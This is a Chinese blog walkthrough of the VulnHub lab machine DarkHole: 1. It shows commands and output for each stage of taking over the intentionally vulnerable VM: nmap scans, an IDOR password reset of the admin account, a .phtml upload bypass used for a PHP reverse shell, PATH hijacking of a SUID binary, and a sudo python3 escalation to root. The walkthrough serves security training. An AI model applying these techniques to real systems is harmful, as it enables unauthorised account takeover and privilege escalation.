【安全】vulnub靶机DARKHOLE: 1

DARKHOLE: 1About ReleaseBack to the TopName: DarkHole: 1Date release: 18 Jul 2021Author: Jehad AlqurashiSeries: DarkHoleDownloadBack to the TopPlease remember that VulnHub is a free community resource

猫先生的早茶

4227人浏览 · 2022-01-20 18:49:18

猫先生的早茶 · 2022-01-20 18:49:18 发布

DARKHOLE: 1

About Release
Back to the Top
Name: DarkHole: 1
Date release: 18 Jul 2021
Author: Jehad Alqurashi
Series: DarkHole

Download

Back to the Top
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!
DarkHole.zip (Size: 2.9 GB)
Download (Mirror): https://download.vulnhub.com/darkhole/DarkHole.zip
Download (Torrent): https://download.vulnhub.com/darkhole/DarkHole.zip.torrent   ( Magnet)

实战步骤

1.首先我们进行网络发现（连IP都不知道咋渗透呢i( •̀ ω •́ )✧）

root@debian:~# nmap -sP 192.168.129.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2022-01-20 04:41 EST
Nmap scan report for 192.168.129.1
Host is up (-0.20s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.129.2
Host is up (-0.18s latency).
MAC Address: 00:50:56:F9:44:87 (VMware)
Nmap scan report for 192.168.129.146
Host is up (0.00022s latency).
MAC Address: 00:0C:29:A8:D2:BC (VMware)
Nmap scan report for 192.168.129.254
Host is up (0.00022s latency).
MAC Address: 00:50:56:E9:6E:9B (VMware)
Nmap scan report for 192.168.129.134
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 10.92 seconds
root@debian:~#

2.我们发现了目标主机：192.168.129.146。我们来探测下对方开启了哪些端口

root@debian:~# nmap -A 192.168.129.146

Starting Nmap 7.40 ( https://nmap.org ) at 2022-01-20 04:44 EST
Nmap scan report for 192.168.129.146
Host is up (0.00064s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: DarkHole
MAC Address: 00:0C:29:A8:D2:BC (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.40%E=4%D=1/20%OT=22%CT=1%CU=34940%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=61E92F0D%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4
OS:ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1
OS:=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O
OS:=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N
OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 192.168.129.146

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.97 seconds

3.可以看到对方开启了22和80端口，查看下80端口
（PS：一般ssh上能直接getshell的漏洞较少，我们的主要目标是对方的网站）
在这里插入图片描述

4.我们ctrl+U 看下网页源代码中有没有特殊的内容
在这里插入图片描述
5.发现有个登录界面login.php
6.试了下常用的万能密码没有登录成功，试下注册个账号
7.用我们注册的账号登录进去

8.没发现可以上传文件的地方，倒是发现了重置密码的地方
我们尝试重置下密码，并f12看下网络流量
在这里插入图片描述
9.发现密码重置时POST提交的数据为

POST /dashboard.php?id=2 HTTP/1.1
Host: 192.168.129.146
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://192.168.129.146
Connection: keep-alive
Referer: http://192.168.129.146/dashboard.php?id=2
Cookie: PHPSESSID=2saleoclkkmpoj8rug707qolf6
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

password=admin%40123&id=2

10.我们发现post提交的数据中有个id=2，我们尝试改成id=1,
看看能不能把其他用户的密码重置掉
在这里插入图片描述 11.返回200，内容上看应该重置成功了

12.我们试下99.99%开发都会创建的管理员用户名admin，并用刚刚重置的密码登陆下

13.发现登录成功了，页面上看到了个上传文件的地方
我们先传个图片文件看看
(PS: 有的时候网站后台的文件上传功能是坏的，不管是不是合格的文件都传不了，一定要先传个正常的文件测试下上传功能不是不是正常的)
在这里插入图片描述
14.上传成功了，我们尝试上传个phpinfo.php

15.提示只能上传jpg,png,gif后缀的文件，我们尝试上传个txt后缀的文件，看看是不是真的只能上传jpg,png,gif后缀的文件

16.txt后缀的文件也上传成功了
目前我们知道php后缀的文件上传不成功
可问题是不上传php文件没法执行并获取webshell…
啊，这，网安人太难了i`(>﹏<)′
问问万能的百度
在这里插入图片描述 17.我们知道php常用的文件后缀名还有
php3，pht，phtml，phps
挨个测试下
18.经过测试发现只有Phtml后缀的成功被当作php文件运行

19.我们传个php-reverse-shell-1.0反弹个shell
20.使用python3换个bash环境

$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@darkhole:/$

21.使用find命令查找下可以用来提权的文件

www-data@darkhole:/$ find / -user root -perm -4000 2> /dev/null
find / -user root -perm -4000 2> /dev/null
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/mount
/home/john/toto
/snap/snapd/14295/usr/lib/snapd/snap-confine
/snap/snapd/12398/usr/lib/snapd/snap-confine
/snap/core18/2284/bin/mount
/snap/core18/2284/bin/ping
/snap/core18/2284/bin/su
/snap/core18/2284/bin/umount
/snap/core18/2284/usr/bin/chfn
/snap/core18/2284/usr/bin/chsh
/snap/core18/2284/usr/bin/gpasswd
/snap/core18/2284/usr/bin/newgrp
/snap/core18/2284/usr/bin/passwd
/snap/core18/2284/usr/bin/sudo
/snap/core18/2284/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2284/usr/lib/openssh/ssh-keysign
/snap/core18/2074/bin/mount
/snap/core18/2074/bin/ping
/snap/core18/2074/bin/su
/snap/core18/2074/bin/umount
/snap/core18/2074/usr/bin/chfn
/snap/core18/2074/usr/bin/chsh
/snap/core18/2074/usr/bin/gpasswd
/snap/core18/2074/usr/bin/newgrp
/snap/core18/2074/usr/bin/passwd
/snap/core18/2074/usr/bin/sudo
/snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2074/usr/lib/openssh/ssh-keysign
/snap/core20/1270/usr/bin/chfn
/snap/core20/1270/usr/bin/chsh
/snap/core20/1270/usr/bin/gpasswd
/snap/core20/1270/usr/bin/mount
/snap/core20/1270/usr/bin/newgrp
/snap/core20/1270/usr/bin/passwd
/snap/core20/1270/usr/bin/su
/snap/core20/1270/usr/bin/sudo
/snap/core20/1270/usr/bin/umount
/snap/core20/1270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1270/usr/lib/openssh/ssh-keysign

22.发现/home/john/toto可以用来提权，尝试执行下

www-data@darkhole:/$ /home/john/toto
/home/john/toto
uid=1001(john) gid=33(www-data) groups=33(www-data)
www-data@darkhole:/$

23.看样子应该是以john用户权限执行了id命令
我们来做个恶意的PATH环境看看能不能获取john用户的权限

www-data@darkhole:/$ cd /tmp
cd /tmp
www-data@darkhole:/tmp$ echo "/bin/bash" > id
echo "/bin/bash" > id
www-data@darkhole:/tmp$ chmod a+x id
chmod a+x id
www-data@darkhole:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@darkhole:/tmp$

24.执行/home/john/toto

www-data@darkhole:/tmp$ /home/john/toto
/home/john/toto
john@darkhole:/tmp$ whoami
whoami
john
john@darkhole:/tmp$

25.成功获取了john用户的权限，我们到当前用户的家目录下看看有啥文件

john@darkhole:/tmp$ cd /home/john
cd /home/john
john@darkhole:/home/john$ ls -al
ls -al
total 72
drwxrwxrwx 5 john john      4096 Jan 20 09:37 .
drwxr-xr-x 4 root root      4096 Jul 16  2021 ..
-rw------- 1 john john      1722 Jul 17  2021 .bash_history
-rw-r--r-- 1 john john       220 Jul 16  2021 .bash_logout
-rw-r--r-- 1 john john      3771 Jul 16  2021 .bashrc
drwx------ 2 john john      4096 Jul 17  2021 .cache
drwxrwxr-x 3 john john      4096 Jul 17  2021 .local
-rw------- 1 john john        37 Jul 17  2021 .mysql_history
-rw-r--r-- 1 john john       807 Jul 16  2021 .profile
drwxrwx--- 2 john www-data  4096 Jan 20 08:49 .ssh
-rwxrwx--- 1 john john         0 Jan 20 09:38 file.py
-rwxrwx--- 1 john john         8 Jul 17  2021 password
-rwsr-xr-x 1 root root     16784 Jul 17  2021 toto
-rw-rw---- 1 john john        24 Jul 17  2021 user.txt
john@darkhole:/home/john$

26.看下user.txt

john@darkhole:/home/john$ cat user.txt
cat user.txt
DarkHole{You_Can_DO_It}
john@darkhole:/home/john$

27.看下password
得到密码root123

john@darkhole:/home/john$ cat password
cat password
root123
john@darkhole:/home/john$

28.看下file.py

john@darkhole:/home/john$ cat file.py
cat file.py

john@darkhole:/home/john$

29.看下当前用户可以用sudo执行啥命令

john@darkhole:/home/john$ sudo -l
sudo -l
[sudo] password for john: root123

Matching Defaults entries for john on darkhole:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User john may run the following commands on darkhole:
    (root) /usr/bin/python3 /home/john/file.py
john@darkhole:/home/john$

30.看样子是以root权限执行了/usr/bin/python3 /home/john/file.py
那我们在 /home/john/file.py中写入python代码尝试获取shell环境

john@darkhole:/home/john$ echo "import pty;pty.spawn('/bin/bash')" > /home/john/file.py
"import pty;pty.spawn('/bin/bash')" > /home/john/file.py
john@darkhole:/home/john$ sudo /usr/bin/python3 /home/john/file.py
sudo /usr/bin/python3 /home/john/file.py
root@darkhole:/home/john# whoami
whoami
root
root@darkhole:/home/john#

成功获取root权限，骚年你成功打下了一台服务器，恭喜你！！！